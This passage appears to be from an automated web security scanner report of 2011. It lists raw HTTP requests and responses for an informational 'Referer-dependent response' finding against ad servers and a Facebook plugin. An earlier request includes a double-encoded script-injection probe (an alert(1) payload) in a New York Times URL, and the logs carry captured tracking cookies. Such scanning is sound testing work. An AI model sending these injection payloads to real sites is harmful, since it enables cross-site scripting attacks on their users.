User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://myaccount.nytimes.com/auth/login?URI=http://dealbook.nytimes.com/category/main-topicse7f31%2522%253E%253Cscript%253Ealert%25281%2529%253C/script%253Ed4e86dd7255/mergers-acquisitions/
Cookie: RMID=0f2ce1bc50c84dca6d901646; nyt-m=ABBCA6EE6FB956FC70EF4BEBA92D8B48&e=i.1306900800&t=i.20&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1305111957&vr=l.4.0.0.0.0&pr=l.4.15.0.0.0&vp=i.0&gf=l.20.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; nyt-recmod=1; nyt-nofb=0; WT_FPC=id=173.193.214.243-1926640512.30150603:lv=1305199607199:ss=1305199567634; rsi_segs=D08734_70010|D08734_70105|H07707_11028|H07707_11029|H07707_11044|H07707_11048; news_people_toolbar=NO

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 12 May 2011 11:27:10 GMT
Content-type: application/x-javascript
Last-modified: Wed, 06 Apr 2011 21:29:47 GMT
ntCoent-length: 1250
Etag: "4e2-4d9cdb4b"
Accept-ranges: bytes
Cache-Control: private
Content-Length: 1250


// Simple JavaScript Templating
// John Resig - http://ejohn.org/ - MIT Licensed
// Modified to sit happily in our NYTD Namespace
(function(){
var cache = {};

NYTD.Template = function(str, data
...[SNIP]...
he data as local variables using with(){}
"with(obj){p.push('" +

// Convert the template into pure JavaScript
str
.replace(/[\r\t\n]/g, " ")
.split("<%").join("\t")
.replace(/((^|%>)[^\t]*)'/g, "$1\r")
.replace(/\t=(.*?)%>
...[SNIP]...

17. Referer-dependent response
There are 4 instances of this issue:

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses are updated based on Referer data, then the same defences against malicious input should be employed here as for any other kind of user-supplied data.



17.1. http://ad.yieldmanager.com/imp

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.yieldmanager.com
Path:   /imp

Request 1

GET /imp?Z=0x0&anmember=541&anprice=&y=29&s=1748713&_salt=1407533862&B=10&r=0 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: [cookie values omitted]

Response 1

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:02:03 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0196.rm.bf1
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Thu, 12 May 2011 12:02:03 GMT
Pragma: no-cache
Content-Length: 7080
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

oV1=window; function fStart(u,n,v) { if (!oV1.opera) var twin=oV1.open(u,n,v); if (!window.fV1) {fV13();} var w=oV2(u,n,v); var wo=vWA[w]; wo.pw=twin; fV3("fV10(" + w + ")",100); return (wo.pw&&fV35)
...[SNIP]...
wUtAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADsRBEAAAAAAAICAgAAAAAAaJHtfD81IkBoke18PzUiQAAAAAAAAAAA..-.J2RBLUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAsQ9Oqu7AUCu0Vv0IxA4-HPcwjaDkZa8Y4e8KdAAAAAA==,,http%3A%2F%2Fpepperhamilton.com%2F%3Fepl%3D7vc_zcf-qaineur8rrn2eld1uychhmipkrv4hu2icszqhp18zi-zqhke8c0nditmgf6myi8crelfjtduqvtegsrgy6_nrn4uxmreqxnqebzqbc2utdekuiaxnrmz27autdpfjeh2pryyomlkmtkon5opgpo8kgkayibaqbf1acaq3oe_aadgfwuaaeca2wgaako-cvbzuyzzqte2afpcgwaaapa,Z%3D0x0%26anmember%3D541%26anprice%3D%26y%3D29%26s%3D1748713%26_salt%3D1407533862%26B%3D10%26r%3D0,a63431b0-7c8f-11e0-9572-678fd7baf522','','height='+screen.height+',width=' + screen.width + ',left=0,top=0,toolbar=0,status=0,menubar=0,resizable=1,scrollbars=1,location=0');
pop.blur();
window.focus();

Request 2

GET /imp?Z=0x0&anmember=541&anprice=&y=29&s=1748713&_salt=1407533862&B=10&r=0 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: [cookie values omitted]

Response 2

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:02:25 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0358.rm.bf1
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Thu, 12 May 2011 12:02:25 GMT
Pragma: no-cache
Content-Length: 6818
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

oV1=window; function fStart(u,n,v) { if (!oV1.opera) var twin=oV1.open(u,n,v); if (!window.fV1) {fV13();} var w=oV2(u,n,v); var wo=vWA[w]; wo.pw=twin; fV3("fV10(" + w + ")",100); return (wo.pw&&fV35)
...[SNIP]...
wUtAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADsRBEAAAAAAAICAgAAAAAAaJHtfD81IkBoke18PzUiQAAAAAAAAAAA..-.J2RBLUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADlhh4N0bAUCvWwAJk.ezR3ozd5uL1NqfooU4dyAAAAAA==,,,Z%3D0x0%26anmember%3D541%26anprice%3D%26y%3D29%26s%3D1748713%26_salt%3D1407533862%26B%3D10%26r%3D0,b37ed424-7c8f-11e0-8c5d-a30c628d5c81','','height='+screen.height+',width=' + screen.width + ',left=0,top=0,toolbar=0,status=0,menubar=0,resizable=1,scrollbars=1,location=0');
pop.blur();
window.focus();

17.2. http://ads.adbrite.com/adserver/vdi/742697

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/742697

Request 1

GET /adserver/vdi/742697?d=2931142961646634775 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&mktid=40&mpid=-1&fpid=-1&rnd=7978057364051197680&nu=n&sp=n
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Ax6zw%2Cxews%2Clln4%2Cllra%2Cx4co%2Cx4cn%2Cx4cw%2C12gg8%2C12ggb%2C6e73"; rb="0:682865:20838240:null:0:684339:20838240:uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:712156:20861280:xrd52zkwjuxh:0:742697:20828160:2931142961646634775:0:753292:20858400:AM-00000000030620452:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:779045:20861280:17647108006034089:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0:810647:21077280:549188a1-a07c-4231-be94-7f725e1a19f7:0:830697:20838240:9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC:0"; srh="1%3Aq64FAA%3D%3D"; rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo5CgY2ODQzMzkYvo6xlxEiKXV1aWQ9NGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2ChwKBjcxMjE1Nhjo2_vjEyIMeHJkNTJ6a3dqdXhoCiMKBjc0MjY5NxjFp47PDiITMjkzMTE0Mjk2MTY0NjYzNDc3NQokCgY3NTMyOTIYyYemhBYiFEFNLTAwMDAwMDAwMDMwNjIwNDUyCjAKBjc2MjcwMRjVqo2sFiIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKIQoGNzc5MDQ1GM_BmeATIhExNzY0NzEwODAwNjAzNDA4OQoWCgY3ODI2MDYQ77DQ1gwYj-zHqhYiAAo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZQo0CgY4MTA2NDcYycGHhEQiJDU0OTE4OGExLWEwN2MtNDIzMS1iZTk0LTdmNzI1ZTFhMTlmNwowCgY4MzA2OTcYi9eDzQ4iIDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDEAE; ut="1%3AXZFJloMgFEX3wtgBoKgnu9HYoNJIo0ZD9h4gSR2t6eX%2Bx%2FvwBCsGtyeY2n2TujHgBvTG%2BOKQ4qYoHHIwCcAEMBdNBHdKy17BavWQ9ZY77OrEDINIg1XDOObQOMHgCjJhYvvPUetd3CRKpcfmSZlq5gkiP6%2BTF%2B9H%2BYUa1jLmSW036QqX1%2BmfKP6Ns3zY8yzQBi7s3J7OHh4jvaxE5RmaKbXB4kqguFLGpV9pfqzKR2k0rtnngbgUsbdqym9abDOQa21stM%2BZ904IVzmE7JGYsst5yCLj41ykxWGUwv5bBOElWhM5XZAX9%2FMFIAF1JUSrh%2FiP4PV6Aw%3D%3D"; 
vsd=0@1@4dcaa3a0@d.xp1.ru4.com

Response 1

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Thu, 12 May 2011 11:39:41 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo5CgY2ODQzMzkYvo6xlxEiKXV1aWQ9NGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2ChwKBjcxMjE1Nhjo2_vjEyIMeHJkNTJ6a3dqdXhoCiMKBjc0MjY5NxjNt9jGDyITMjkzMTE0Mjk2MTY0NjYzNDc3NQokCgY3NTMyOTIYyYemhBYiFEFNLTAwMDAwMDAwMDMwNjIwNDUyCjAKBjc2MjcwMRjVqo2sFiIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKIQoGNzc5MDQ1GM_BmeATIhExNzY0NzEwODAwNjAzNDA4OQoWCgY3ODI2MDYQ77DQ1gwYj-zHqhYiAAo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZQo0CgY4MTA2NDcYycGHhEQiJDU0OTE4OGExLWEwN2MtNDIzMS1iZTk0LTdmNzI1ZTFhMTlmNwowCgY4MzA2OTcYi9eDzQ4iIDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDEAE; path=/; domain=.adbrite.com; expires=Wed, 10-Aug-2011 11:39:41 GMT
Set-Cookie: ut="1%3AXZHJloMgEEX%2FhbULQFFP%2FkbjzCSDGg359wDpdGtvb91XvDo8wYrB7Qlou29SNwbcgN4YXxxS3BSFQw4mAZgA5qKJ4D4MZa9gtXrIessddnVixlGkwaphjDk0URhcQSgmtv%2BMWu%2FiJlEqPTZPylQzTxD5ep28eF%2FKL9SwljFPartJV7i8Tn9F8S%2FO8nHPs0AbuLBz%2B2H28JiGz0nzY1V%2BrNG0ZhEYmtpgcCVQPCfjEv6F5TmsuRSxt2rKnydim5Fca2Oj%2Fa5574RwlUPIHokpu5yHd8n0OLdrcYgOsD%2Fty4v7dR9FeIlZSoIGElBXQrR6jP8IXq83"; path=/; domain=.adbrite.com; expires=Sun, 09-May-2021 11:39:41 GMT
Set-Cookie: vsd=0@1@4dcbc6fd@cdn.turn.com; path=/; domain=.adbrite.com; expires=Sat, 14-May-2011 11:39:41 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

Request 2

GET /adserver/vdi/742697?d=2931142961646634775 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Ax6zw%2Cxews%2Clln4%2Cllra%2Cx4co%2Cx4cn%2Cx4cw%2C12gg8%2C12ggb%2C6e73"; rb="0:682865:20838240:null:0:684339:20838240:uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:712156:20861280:xrd52zkwjuxh:0:742697:20828160:2931142961646634775:0:753292:20858400:AM-00000000030620452:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:779045:20861280:17647108006034089:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0:810647:21077280:549188a1-a07c-4231-be94-7f725e1a19f7:0:830697:20838240:9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC:0"; srh="1%3Aq64FAA%3D%3D"; rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo5CgY2ODQzMzkYvo6xlxEiKXV1aWQ9NGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2ChwKBjcxMjE1Nhjo2_vjEyIMeHJkNTJ6a3dqdXhoCiMKBjc0MjY5NxjFp47PDiITMjkzMTE0Mjk2MTY0NjYzNDc3NQokCgY3NTMyOTIYyYemhBYiFEFNLTAwMDAwMDAwMDMwNjIwNDUyCjAKBjc2MjcwMRjVqo2sFiIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKIQoGNzc5MDQ1GM_BmeATIhExNzY0NzEwODAwNjAzNDA4OQoWCgY3ODI2MDYQ77DQ1gwYj-zHqhYiAAo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZQo0CgY4MTA2NDcYycGHhEQiJDU0OTE4OGExLWEwN2MtNDIzMS1iZTk0LTdmNzI1ZTFhMTlmNwowCgY4MzA2OTcYi9eDzQ4iIDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDEAE; ut="1%3AXZFJloMgFEX3wtgBoKgnu9HYoNJIo0ZD9h4gSR2t6eX%2Bx%2FvwBCsGtyeY2n2TujHgBvTG%2BOKQ4qYoHHIwCcAEMBdNBHdKy17BavWQ9ZY77OrEDINIg1XDOObQOMHgCjJhYvvPUetd3CRKpcfmSZlq5gkiP6%2BTF%2B9H%2BYUa1jLmSW036QqX1%2BmfKP6Ns3zY8yzQBi7s3J7OHh4jvaxE5RmaKbXB4kqguFLGpV9pfqzKR2k0rtnngbgUsbdqym9abDOQa21stM%2BZ904IVzmE7JGYsst5yCLj41ykxWGUwv5bBOElWhM5XZAX9%2FMFIAF1JUSrh%2FiP4PV6Aw%3D%3D"; 
vsd=0@1@4dcaa3a0@d.xp1.ru4.com

Response 2

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Thu, 12 May 2011 11:40:13 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo5CgY2ODQzMzkYvo6xlxEiKXV1aWQ9NGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2ChwKBjcxMjE1Nhjo2_vjEyIMeHJkNTJ6a3dqdXhoCiMKBjc0MjY5NxilttrGDyITMjkzMTE0Mjk2MTY0NjYzNDc3NQokCgY3NTMyOTIYyYemhBYiFEFNLTAwMDAwMDAwMDMwNjIwNDUyCjAKBjc2MjcwMRjVqo2sFiIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKIQoGNzc5MDQ1GM_BmeATIhExNzY0NzEwODAwNjAzNDA4OQoWCgY3ODI2MDYQ77DQ1gwYj-zHqhYiAAo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZQo0CgY4MTA2NDcYycGHhEQiJDU0OTE4OGExLWEwN2MtNDIzMS1iZTk0LTdmNzI1ZTFhMTlmNwowCgY4MzA2OTcYi9eDzQ4iIDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDEAE; path=/; domain=.adbrite.com; expires=Wed, 10-Aug-2011 11:40:13 GMT
Set-Cookie: ut="1%3AXZHJloMgEEX%2FhbULQFFP%2FkbjzCSDGg359wDpdGtvb91XvDo8wYrB7Qlou29SNwbcgN4YXxxS3BSFQw4mAZgA5qKJ4D4MZa9gtXrIessddnVixlGkwaphjDk0URhcQSgmtv%2BMWu%2FiJlEqPTZPylQzTxD5ep28eF%2FKL9SwljFPartJV7i8Tn9F8S%2FO8nHPs0AbuLBz%2B2H28JiGz0nzY1V%2BrNG0ZhEYmtpgcCVQPCfjEv6F5TmsuRSxt2rKnydim5Fca2Oj%2Fa5574RwlUPIHokpu5yHd8n0OLdrcYgOsD%2Fty4v7dR9FeIlZSoIGElBXQrR6jP8IXq83"; path=/; domain=.adbrite.com; expires=Sun, 09-May-2021 11:40:13 GMT
Set-Cookie: vsd=; path=/; domain=.adbrite.com; expires=Thu, 12-May-2011 11:40:13 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

17.3. http://adserving.cpxinteractive.com/st

Summary

Severity:   Information
Confidence:   Firm
Host:   http://adserving.cpxinteractive.com
Path:   /st

Request 1

GET /st?ad_type=pop&ad_size=0x0&section=1748713&banned_pop_types=29&pop_times=1&pop_frequency=0&pop_nofreqcap=1 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 13-May-2011 12:01:57 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 12 May 2011 12:01:57 GMT
Content-Length: 669

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&inv_code=1748713&media_subtypes=popunder&pop_freq_times=1&pop_freq_duration=0&referrer=http://pepperhamilton.com/%3Fepl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dpop%26ad_size%3D0x0%26section%3D1748713%26banned_pop_types%3D29%26pop_times%3D1%26pop_frequency%3D0%26pop_nofreqcap%3D1"></scr'+'ipt>');

Request 2

GET /st?ad_type=pop&ad_size=0x0&section=1748713&banned_pop_types=29&pop_times=1&pop_frequency=0&pop_nofreqcap=1 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 13-May-2011 12:02:20 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 12 May 2011 12:02:20 GMT
Content-Length: 407

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&inv_code=1748713&media_subtypes=popunder&pop_freq_times=1&pop_freq_duration=0&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dpop%26ad_size%3D0x0%26section%3D1748713%26banned_pop_types%3D29%26pop_times%3D1%26pop_frequency%3D0%26pop_nofreqcap%3D1"></scr'+'ipt>');

17.4. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/like.php

Request 1

GET /plugins/like.php?&width=400&height=80&layout=standard&show_faces=true&action=like&font=arial&colorscheme=light&href=http%3A%2F%2Fwww.bing.com%3Fssd%3D20110512_0700%26ssh%3DS423239929%26FORM%3DHPFBLK%26mkt%3Den-US%26 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.145.48
X-Cnection: close
Date: Thu, 12 May 2011 10:59:38 GMT
Content-Length: 8669

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4dcbbd9ad7ecc8456782034" class="connect_widget" style="font-family: &quot;arial&quot;, sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_facebook_favicon"></span><span class="connect_widget_user_action connect_widget_text hidden_elem">You like <b>Today&#039;s picture</b>.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_share_comment_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_share_comment_option">Add Comment</a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You and 199 others like this.</span><span class="connect_widget_not_connected_text">199 likes. 
<a href="/campaign/landing.php?campaign_id=137675572948107&amp;partner_id=bing.com&amp;placement=like_button&amp;extra_1=http%3A%2F%2Fwww.bing.com%2F&amp;extra_2=US" target="_blank">Sign Up</a> to see
...[SNIP]...

Request 2

